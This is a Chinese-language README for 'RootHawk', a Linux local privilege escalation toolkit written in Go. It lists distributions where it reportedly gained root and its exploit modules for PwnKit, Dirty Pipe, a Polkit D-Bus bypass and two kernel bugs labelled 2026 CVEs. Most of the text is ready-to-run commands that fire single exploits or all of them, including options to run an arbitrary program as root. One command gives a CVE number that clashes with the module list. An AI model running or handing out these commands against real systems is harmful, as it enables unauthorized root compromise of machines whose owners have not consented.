RootHawk 是一个 Linux 本地安全测试终端工具,用 Go 编写,面向授权靶机、虚拟机和实验环境。
| 序号 | 操作系统 | 测试漏洞 | 测试结果 | 说明 |
|---|---|---|---|---|
| 1 | AnolisOS | CVE-2026-31431 / Copy Fail | ✅ 成功 | 工具在该系统环境下测试通过 |
| 2 | openEuler | CVE-2026-31431 / Copy Fail | ✅ 成功 | 工具在该系统环境下测试通过 |
| 3 | 统信 UOS | CVE-2026-31431 / Copy Fail | ✅ 成功 | 工具在该系统环境下测试通过 |
| 4 | openKylin | CVE-2026-31431 / Copy Fail | ✅ 成功 | 工具在该系统环境下测试通过 |
| 5 | Ubuntu | CVE-2026-31431 / Copy Fail | ✅ 成功 | 工具在该系统环境下测试通过 |
| 6 | CentOS 7 | CVE-2021-4034 / PwnKit | ✅ 成功 | 工具在该系统环境下测试通过 |
./RootHawk-amd64 -e CVE-2026-43284
./RootHawk-amd64 -e CVE-2026-31431
./RootHawk-amd64 -e CVE-2026-4034
RootHawk/
├── bin/
│ ├── RootHawk-amd64
│ ├── RootHawk-arm64
│ └── RootHawk-386
├── pkg/
│ ├── exploits/
│ │ ├── cve20214034/
│ │ ├── cve20213560/
│ │ ├── cve20220847/
│ │ ├── cve202631431/
│ │ └── cve202643284/
│ │ ├── exploit.go
│ │ └── exp.c
│ ├── logger/
│ ├── payloads/
│ ├── pipe/
│ ├── shell/
│ └── state/
├── roothawk.go
├── go.mod
├── go.sum
├── NOTICE.md
└── README.md
bin/RootHawk-amd64
bin/RootHawk-arm64
bin/RootHawk-386
Ubuntu amd64 虚拟机使用:
chmod +x RootHawk-amd64
./RootHawk-amd64 -help查看帮助:
./RootHawk-amd64 -help查看模块列表:
./RootHawk-amd64 -list执行指定 CVE:
./RootHawk-amd64 -e CVE-2022-0847按顺序执行全部模块:
./RootHawk-amd64 -any-list 显示当前集成的 CVE 模块
-e <名称> 执行指定 CVE 或别名
-any 按列表顺序执行全部模块
-pk <路径> 指定 CVE-2021-4034 使用的 pkexec 路径,默认 /usr/bin/pkexec
-backup <路径> CVE-2026-31431 执行前备份 su 到指定路径
-exec <路径> CVE-2026-31431 提权后执行指定程序,而不是进入 su
-v 尽量输出详细日志
-help 显示帮助
| CVE 编号 | 常见名称/别名 | 漏洞类型/组件 |
|---|---|---|
| CVE-2026-31431 | Copy Fail | Linux Kernel 本地提权,涉及 crypto / AF_ALG / algif_aead 相关逻辑问题。 |
| CVE-2026-43284 | Dirty Frag,也有人叫 CopyFail2 | Linux Kernel 本地提权,涉及 xfrm/esp、shared skb frags 等内核网络/数据包处理路径。 |
| CVE-2021-4034 | PwnKit | Polkit 的 pkexec 本地提权漏洞。 |
| CVE-2021-3560 | Polkit D-Bus 权限绕过 / Polkit Authentication Bypass | Polkit 本地提权,可通过 D-Bus 请求绕过凭据检查,提升权限;没有像 PwnKit 那样特别统一的短名字。 |
| CVE-2022-0847 | Dirty Pipe | Linux Kernel 本地提权,管道机制相关漏洞。 |
./RootHawk-amd64 -list
./RootHawk-amd64 -e CVE-2021-4034
./RootHawk-amd64 -e CVE-2021-4034 -pk /usr/bin/pkexec
./RootHawk-amd64 -e CVE-2026-31431 -backup /tmp/su.bak
./RootHawk-amd64 -e CVE-2026-31431 -backup /tmp/su.bak -exec /tmp/root-task
./RootHawk-amd64 -e CVE-2026-43284 -v
./RootHawk-amd64 -any